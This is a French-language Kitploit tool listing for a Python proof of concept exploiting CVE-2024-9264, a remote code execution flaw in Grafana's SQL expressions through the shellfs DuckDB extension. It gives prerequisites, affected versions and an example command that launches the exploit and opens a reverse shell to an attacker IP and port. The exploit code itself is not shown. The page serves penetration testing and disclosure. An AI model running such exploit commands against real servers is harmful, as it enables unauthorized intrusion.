Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9264 — Preuve de concept en Python pour l'exécution de code à distance dans Grafana via les expressions SQL, exploitant une désinfection insuffisante des entrées pour exécuter des commandes shell arbitraires sur des cibles authentifiées. | Kitploit
Outils/GitHubGitHub/royall-researchers/cve-2024-9264
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed Teaming
GitHubroyall-researchers/cve-2024-9264

CVE-2024-9264

Preuve de concept en Python pour l'exécution de code à distance dans Grafana via les expressions SQL, exploitant une désinfection insuffisante des entrées pour exécuter des commandes shell arbitraires sur des cibles authentifiées.

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-9264-RCE-Exploit dans Grafana via les expressions SQL

Description

Preuve de concept pour l'exécution de code à distance (RCE) dans Grafana (CVE-2024-9264)

Ce dépôt contient un script Python qui exploite une vulnérabilité d'exécution de code à distance (RCE) dans la fonctionnalité des expressions SQL de Grafana. En tirant parti d'une désinfection insuffisante des entrées, cet exploit permet à un attaquant d'exécuter des commandes shell arbitraires sur le serveur. Cela est rendu possible grâce à l'extension communautaire shellfs, qui peut être installée et chargée par un attaquant pour faciliter l'exécution de commandes.

Prérequis

  • utilisateur Grafana authentifié avec des permissions Viewer ou supérieures
  • Le binaire DuckDB doit être installé et accessible via le PATH de Grafana

Version impactée

Grafana >= v11.0.0 (toutes les v11.x.y sont impactées)

Utilisation

root@kitploit:~
python3 poc.py [--url <cible>] [--username <nom_utilisateur>] [--password <mot_de_passe>] [--reverse-ip <IP>] [--reverse-port <PORT>]

14

Exemple

root@kitploit:~
python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001

Avertissement

Ce script est destiné à des fins éducatives et à une utilisation dans des environnements contrôlés où vous avez l'autorisation de tester la sécurité du système. Une mauvaise utilisation de cet outil pourrait entraîner des conséquences juridiques.

En savoir plus

https://zekosec.com/blog/file-read-grafana-cve-2024-9264/

https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264/

Télécharger l’outil